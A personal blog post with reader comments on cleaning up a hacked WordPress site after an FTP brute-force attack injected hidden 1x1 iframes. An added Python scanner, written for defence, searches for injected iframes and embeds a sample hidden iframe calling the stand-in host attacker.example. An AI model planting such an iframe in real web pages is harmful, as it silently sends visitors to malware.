Jan Karlsbjerg

A Great Dane in Vancouver

So your WordPress was hacked… Now what?

Local blogger friend Dr. Beth Snow's site was hit with a PHP injection attack. My blog was hacked using that mechanism last summer, but today I realized that I never wrote down the recipe for cleaning it out. So here goes.

Form of the attack

The attack takes the form of extra PHP code that gets appended to existing files on the webserver and written into new files that are likely to get called. The goal is to redirect visitors' browsers to a third-party website where there's bad stuff waiting to be downloaded.

Vector

Most likely the site got hacked by a bot that did a brute-force password guessing attack on the FTP account. Once the bot gets in, it will add the code to many files.

How to get rid of it

Step 1: Upgrade your FTP password!

Prevent future attacks by upgrading your FTP password. “Sammy32” is NOT a strong password. “rU#9&Jup” is a strong (though quite short) password. If you need inspiration, there are many free strong password generators online.

Step 2: Upgrade the rest of your passwords on that webhost!

Somebody got access to some of your data, and you must assume that they’ve taken full advantage of their access, so change your other passwords too. Including:

  • Database passwords (for a WordPress blog that’s the MySQL password)
  • WordPress user accounts passwords
  • Any password protected directories (whether you set them up manually in the .htaccess file or you used your webhost’s control panel tools to do the same)

Step 3: Check all browsable files on your website

The PHP insertion hack targets browsable files such as .php, .htm and .html. Look for lines of code containing a hidden iframe with width 1 and height 1 (see the post describing the hack on my website).

Donncha O Caoimh, a respected WordPress community contributor, has created a very handy WordPress exploit scanner plugin that will look through your WordPress installation and database. If you have more content on your website than just the WordPress files (e.g. a wiki, a static website, a downloads directory, etc.) then the WordPress plugin won't scan those directories. For that situation I recommend using an editor or another tool that can search all files in a directory tree for a particular string.

Step 4: What to do if you find the hack code

If the hack code is the only content in the file, delete the file.

If you find the hack in any part of the site that you didn't create yourself (WordPress core files, theme files, extensions, etc.), delete that directory and re-upload a freshly downloaded replacement. For plugins, the settings are stored in the DB and will survive this procedure; for theme directories, you might want to first back up .css files, image files and any other files you've modified.

If the hack code is inserted after the ending HTML tag, just delete the hack code and save the file.
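Added here as an example (not part of the original post, and not Donncha's plugin) of the directory-tree search recommended in Step 3 together with the Step 4 check for code appended after the closing HTML tag. The sample files and the attacker.example domain are constructed for the demo.

```python
import re
from pathlib import Path

# Constructed samples: one file with a hidden 1x1 iframe injected after
# </html>, one clean file. "attacker.example" is a placeholder, not a real IoC.
INFECTED = ("<html><body><p>Hello</p></body></html>\n"
            "<iframe src=\"http://attacker.example/x.php\" width=1 height=1 "
            "style=\"visibility:hidden\"></iframe>\n")
CLEAN = "<html><body><p>Hello</p></body></html>\n"

SCAN_SUFFIXES = {".php", ".htm", ".html"}          # browsable files only
# A 1x1 (or 0x0) iframe is the hallmark described in the post.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*\b(?:width|height)\s*=\s*['\"]?[01]\b[^>]*>", re.I)
END_TAG = re.compile(r"</html\s*>", re.I)

def findings(text):
    """Return the reasons this file looks injected (empty list if clean)."""
    reasons = []
    if HIDDEN_IFRAME.search(text):
        reasons.append("hidden iframe")
    m = END_TAG.search(text)
    if m and text[m.end():].strip():        # anything after </html> is suspect
        reasons.append("content after </html>")
    return reasons

def scan_tree(root):
    """Walk root and map each suspicious browsable file to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            r = findings(path.read_text(errors="replace"))
            if r:
                hits[str(path.relative_to(root))] = r
    return hits

def strip_after_end_tag(text):
    """Step 4 case: drop whatever was appended after the closing </html>."""
    m = END_TAG.search(text)
    return text if not m else text[:m.end()] + "\n"

def demo():
    """Write the constructed samples into a temp dir and scan it."""
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        Path(d, "index.php").write_text(INFECTED)
        Path(d, "about.html").write_text(CLEAN)
        Path(d, "notes.txt").write_text(INFECTED)   # not browsable: skipped
        return scan_tree(d)

if __name__ == "__main__":
    for name, why in demo().items():
        print(name, "->", ", ".join(why))
```

Review each hit by hand before deleting anything; a legitimate theme may use a small iframe, and anything after the closing tag in a .php file may be deliberate.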

10 Comments

  1. I think it’s also important to note that you should always have your WordPress installation fully up to date. So many people that run in to issues do so because they are using an aged version of WP, which is no good.

  2. This happened to me a couple of hours ago on a site I’m working on. All the index.php files were edited with iframe code. I’m pretty sure mine was the FTP problem as well, and if you read through http://wordpress.org/support/topic/232657 someone mentions it’s probably not directly related to WP (can happen to any site).

  3. Thanks for explaining how to fix all this! I’m only semi-tech savvy, so I was completely confused as to why my blog was behaving so strangely!

    It still freaks me out that someone hacked into my blog, even if it was a bot.

  4. I just started with a WordPress 2.7 blog, how can I check if it was hacked already, or will that be obvious?

  5. Roger, it probably won’t be obvious. I recommend that you install Donncha’s WordPress plugin that I link to in the post.

  6. I have always found it a bit confusing why someone would desire to hack someone else’s blog?

    Thanks for this post, Jan! We missed you at Meetup of Meetups!

  7. Raul, I had an important family commitment that evening at Denny’s (not kidding).

  8. Thanks for this. The hack (or initial point of entry, or so it looked) was of my xmlrpc.php file. It had everything but ‘From Russia with Love’ strewn on it. I downloaded a virgin copy from WordPress and blew the code away, but by that time, it had inserted something else that I couldn’t find. No matter what I did, the SPAM kept appearing. After about 6 hours of troubleshooting, doing DIFF between normal files and what I had, I finally admitted that I was beaten (this was at about 3:30 in the morning). I think that Donncha’s plugin may come in handy in the future, so I won’t have to do all of that scanning manually, but I have to admit that I’m pretty frightened of just how sophisticated this attack seemed to be. The SPAM wasn’t even in my template files or WordPress code. Instead, at the moment WordPress published a blog post, extra, hidden code would grab the SPAM from who-knows-where, and insert it between the head and body of a post, placing it in a div offscreen, and then inserting it at random in my RSS feed. Nasty.

  9. Thanks for the advice! With the WordPress exploit scanner plugin I was able to find the problem and solve it asap. Turned out it was a php script saved onto my index.php file from the public_html directory. I became aware of it when Google webmaster suggested “tattoo”-related keywords based on my site content, so I opened up my source code and found all sorts of nasty links. What?!


© 2021 Jan Karlsbjerg
